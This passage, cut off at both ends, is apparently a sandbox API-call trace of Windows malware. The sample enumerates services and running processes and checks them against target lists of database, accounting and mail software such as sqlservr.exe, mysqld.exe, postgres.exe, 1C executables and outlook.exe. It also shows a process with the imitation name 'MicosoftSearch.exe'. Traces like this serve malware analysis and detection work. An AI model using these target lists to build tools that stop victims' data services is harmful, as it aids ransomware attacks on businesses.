(lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0245.871] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0245.871] lstrlenW (lpString="gpsvc") returned 5 [0245.871] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0245.871] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0245.871] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0245.871] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0245.871] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0245.871] lstrlenW (lpString="LanmanWorkstation") returned 17 [0245.871] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0245.871] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0245.872] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0245.872] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0245.872] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0245.872] lstrlenW (lpString="lmhosts") returned 7 [0245.872] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0245.872] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0245.872] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0245.872] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0245.872] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0245.872] lstrlenW (lpString="MMCSS") returned 5 [0245.872] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0245.872] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0245.872] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0245.872] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0245.872] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0245.872] lstrlenW (lpString="MpsSvc") returned 6 [0245.872] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0245.872] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0245.872] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0245.872] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0245.872] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0245.872] lstrlenW (lpString="NlaSvc") returned 6 [0245.872] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0245.872] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0245.872] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0245.872] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0245.872] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0245.872] lstrlenW (lpString="nsi") returned 3 [0245.872] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0245.872] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0245.872] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0245.872] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0245.873] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0245.873] lstrlenW (lpString="PcaSvc") returned 6 [0245.873] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0245.873] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0245.873] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0245.873] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0245.873] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0245.873] lstrlenW (lpString="PlugPlay") returned 8 [0245.873] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0245.873] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0245.873] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0245.873] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0245.873] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0245.873] lstrlenW (lpString="Power") returned 5 [0245.873] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0245.873] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0245.873] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0245.873] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0245.873] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0245.873] lstrlenW (lpString="ProfSvc") returned 7 [0245.873] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0245.873] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0245.873] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0245.873] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0245.873] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0245.947] lstrlenW (lpString="RpcEptMapper") returned 12 [0245.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0245.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0245.980] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0245.980] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0245.980] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0245.980] lstrlenW (lpString="RpcSs") returned 5 [0245.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0245.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0245.980] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0245.980] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0245.980] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0245.980] lstrlenW (lpString="SamSs") returned 5 [0245.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0245.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0245.980] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0245.980] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0245.980] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0245.980] lstrlenW (lpString="Schedule") returned 8 [0245.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0245.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0245.980] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0245.980] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0245.980] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0245.980] lstrlenW (lpString="SENS") returned 4 [0245.981] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0245.981] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0245.981] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0245.981] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0245.981] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0245.981] lstrlenW (lpString="ShellHWDetection") returned 16 [0245.981] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0245.981] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0245.981] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0245.981] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0245.981] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0245.981] lstrlenW (lpString="Spooler") returned 7 [0245.981] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0245.981] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0245.981] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0245.981] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0245.981] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0245.981] lstrlenW (lpString="Themes") returned 6 [0245.981] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0245.981] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0245.981] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0245.981] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0245.981] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0245.981] lstrlenW (lpString="UxSms") returned 5 [0245.981] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0245.981] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0245.981] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0245.981] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0245.981] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0245.981] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dee5b0 | out: hHeap=0xb00000) returned 1 [0245.981] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2e8 [0245.982] Process32FirstW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.983] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0245.984] lstrlenW (lpString="System") returned 6 [0245.984] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0245.984] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0245.984] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0245.984] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0245.984] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0245.984] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0245.984] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0245.984] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0245.984] lstrlenW (lpString="smss.exe") returned 8 [0245.984] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0245.984] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0245.984] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0245.984] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0245.984] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0245.984] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0245.984] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0245.984] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.985] lstrlenW (lpString="csrss.exe") returned 9 [0245.985] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0245.985] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0245.985] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0245.985] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0245.985] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0245.985] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0245.985] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0245.985] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0245.985] lstrlenW (lpString="wininit.exe") returned 11 [0245.985] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0245.985] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0245.985] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0245.985] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0245.985] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0245.985] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0245.985] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0245.985] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.986] lstrlenW (lpString="csrss.exe") returned 9 [0245.986] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0245.986] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0245.986] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0245.986] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0245.986] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0245.986] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0245.986] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0245.986] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0245.986] lstrlenW (lpString="winlogon.exe") returned 12 [0245.986] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0245.986] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0245.986] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0245.986] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0245.986] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0245.986] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0245.986] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0245.986] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0245.987] lstrlenW (lpString="services.exe") returned 12 [0245.987] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0245.987] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0245.987] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0245.987] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0245.987] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0245.987] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0245.987] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0245.987] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0245.987] lstrlenW (lpString="lsass.exe") returned 9 [0245.987] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0245.987] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0245.987] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0245.987] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0245.987] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0245.987] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0245.987] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0245.987] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0245.988] lstrlenW (lpString="lsm.exe") returned 7 [0245.988] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0245.988] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0245.988] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0245.988] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0245.988] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0245.988] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0245.988] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0245.988] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.988] lstrlenW (lpString="svchost.exe") returned 11 [0245.988] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0245.988] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0245.988] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0245.988] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0245.988] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0245.988] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0245.988] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0245.988] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.988] lstrlenW (lpString="svchost.exe") returned 11 [0245.989] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0245.989] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0245.989] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0245.989] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0245.989] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0245.989] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0245.989] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0245.989] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.989] lstrlenW (lpString="svchost.exe") returned 11 [0245.989] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0245.989] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0245.989] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0245.989] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0245.989] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0245.989] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0245.989] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0245.989] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.989] lstrlenW (lpString="svchost.exe") returned 11 [0245.989] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0245.989] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0245.990] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0245.990] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0245.990] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0245.990] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0245.990] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0245.990] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.990] lstrlenW (lpString="svchost.exe") returned 11 [0245.990] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0245.990] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0245.990] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0245.990] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0245.990] lstrlenW (lpString="audiodg.exe") returned 11 [0245.990] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.991] lstrlenW (lpString="svchost.exe") returned 11 [0245.991] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.991] lstrlenW (lpString="svchost.exe") returned 11 [0245.991] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0245.991] lstrlenW (lpString="userinit.exe") returned 12 [0245.991] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0245.991] lstrlenW (lpString="dwm.exe") returned 7 [0245.991] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.992] lstrlenW (lpString="explorer.exe") returned 12 [0245.992] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0245.992] lstrlenW (lpString="spoolsv.exe") returned 11 [0245.992] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0245.992] lstrlenW (lpString="taskhost.exe") returned 12 [0245.992] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.993] lstrlenW (lpString="svchost.exe") returned 11 [0245.993] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0245.993] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0245.993] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, 